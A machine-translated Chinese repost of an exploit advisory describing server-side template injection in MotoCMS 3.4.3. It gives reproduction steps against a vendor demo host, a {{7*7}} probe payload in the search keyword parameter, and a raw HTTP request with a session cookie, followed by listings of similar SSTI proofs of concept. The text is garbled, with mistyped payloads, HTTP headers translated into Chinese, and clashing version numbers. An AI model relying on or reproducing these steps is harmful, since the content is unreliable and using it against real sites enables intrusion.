MOTOCMS版本3.4.3-服务器端模板注入（SSTI）

HackApt-37 Team · 04 9, 2025

＃title: MotoCMS版本3.4.3-服务器端模板注入（SSTI）
＃作者: TMRSWRR
＃日期: 31/05/2023
＃vendor: https://www.motocms.com
＃link: https://www.motocms.com/website-templates/demo/189526.html
＃脆弱版本: MOTOCMS 3.0.27
＃＃描述
MotoCMS版本3.4.3商店类别模板被发现包含服务器端模板
通过关键字参数注入（SSTI）漏洞。
##复制步骤
1。打开目标url: https://template189526.motopreview.com/
2。在这里写有效载荷: https://template189526.motopreview.com/store/category/category/search/?page=1limit=36Keyword={7'7*}}
3。您将看到结果是49
vuln URL : https://template189526.motopreview.com/store/category/category/search/?page=1limit=36Keyword={7***}}
get/store/category/search/？page=limit=关键字={{7*7}} http/1.1
HOST: Template189526.Motopreview.com
cookie: phpsessid=7c0qgdvsehaf1a2do6s0bcl4p0; 9B7029E0BD3BE0D41EBEFD47D9F5AE46_SESSION-Started=1685536759239
用户- 代理: Mozilla/5.0（X11; Linux X86_64; RV:102.0）壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML，Application/XHTML+XML，Application/XML; Q=0.9，Image/avif，Image/WebP，/; q=0.8
Accept-Language: en-us，en; q=0.5
Accept-incoding: Gzip，放气
DNT: 1
Referer: https://template189526.motopreview.com/store/category/category/search/?keyword={{3* 343%7D%7D
升级- 不肯定- requests: 1
sec-fetch-dest: iframe
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭

	Winter CMS 1.2.3 - 服务器端模板注入 (SSTI)（已验证） Root #Hack7er1949 01 21, 2025 POC/?Day
H	Camaleon CMS v2.7.0-服务器端模板注入（SSTI） HackApt-37 Team 04 9, 2025 POC/?Day
H	FOF漂亮邮件1.1.2-服务器端模板注入（SSTI） HackApt-37 Team 04 9, 2025 POC/?Day
H	Akaunting 3.1.8-服务器端模板注入（SSTI） HackApt-37 Team 04 9, 2025 POC/?Day
H	冬季CMS 1.2.3-服务器端模板注入（SSTI）（认证） HackApt-37 Team 04 9, 2025 POC/?Day